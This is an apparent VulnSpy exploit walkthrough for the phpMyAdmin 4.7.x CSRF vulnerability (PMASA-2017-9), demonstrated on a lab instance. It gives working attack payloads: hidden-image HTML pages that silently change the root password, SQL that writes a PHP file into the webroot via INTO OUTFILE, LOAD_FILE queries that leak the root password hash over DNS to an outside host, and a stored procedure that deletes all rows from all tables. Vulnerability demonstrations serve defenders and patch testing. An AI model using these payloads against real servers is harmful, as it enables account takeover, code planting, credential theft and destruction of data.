phpMyAdmin 4.7.x XSRF/CSRF vulnerability (PMASA-2017-9)

1 phpMyAmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)

phpMyAdmin is a well-known MySQL/MariaDB online management tool, phpMyAdmin team released the version 4.7.7 that addresses the CSRF vulnerability found by Barot. (PMASA-2017-9). The vulnerability allows an attacker to execute an arbitrary SQL statement silently by inducing an administrator to access malicious pages.

In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

VulnSpy's online phpMyAdmin environment address:

2 Exploit CSRF - Modifying the password of current user

Change the current user password to, SQL command:

SET passsword=PASSWORD('');

Exploit Demonstration

2.1 Log in to phpMyAdmin

Username: root Password: toor


2.2 Create a page with malicious code.

Filename: 2.payload.html

<p>Hello World</p>
<img src="
%20=%20PASSWORD(" style="display:none;" />

2.3 Open the file 2.payload.html in browser


Go back to phpMyAdmin, you'll find that the account has been loged out automatically, and the password of root have been changed.

2.payload.html 2

2.4 Login successfully with the password

Password Changed

3 Exploit CSRF - Arbitrary File Write

Write the code <?php phpinfo();?> to the file /var/www/html/test.php, SQL command:

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';

Exploit Demonstration

3.1 Payload

<p>Hello World</p>
<img src=" '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

3.2 Open the file contain the payload in browser

3.3 Visit test.php


4 Exploit CSRF - Data Retrieval over DNS

Steal the password hash of root, SQL command:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'\\test'));

Fetch the current database name:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'\\test'));

VSPlate not supports this exploit

5 Exploit CSRF - Empty All Rows From All Tables

Empty all rows from all tables, SQL command:

        DECLARE i INT;
        SET i = 0;
        WHILE i < 100 DO
            SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
            PREPARE STMT FROM @del;
            EXECUTE STMT;
            SET i = i +1;
        END WHILE;
    END $$


Exploit Demonstration

5.1 Payload

<p>Hello World</p>
<img src="" style="display:none;" />

5.2 Open the file contain the payload in browser

5.3 Go back to phpMyAdmin

You'll find the data in database vulnspy_tables and vulnspy_test have been deleted.

Empty DBS

GitHub Source


PMASA-2017-9 -
CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click! -
phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit -
phpMyAdmin 4.7.x CSRF 漏洞利用 -

All rights reserved. © 2021 VULNSPY